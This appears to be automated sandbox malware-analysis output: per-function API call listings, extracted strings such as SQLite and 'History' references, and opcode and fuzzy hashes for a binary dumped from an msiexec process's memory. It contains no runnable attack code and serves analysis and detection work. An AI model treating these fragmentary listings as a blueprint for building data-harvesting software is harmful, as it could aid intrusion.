                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 1775345501-2769808009
                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1265369119-0
                                                              • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                              • free.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: e793fa796aef0f07f419f152c53c6a77b8831374cf7a49b8641c5e4cd1935c75
                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                              • Opcode Fuzzy Hash: e793fa796aef0f07f419f152c53c6a77b8831374cf7a49b8641c5e4cd1935c75
                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
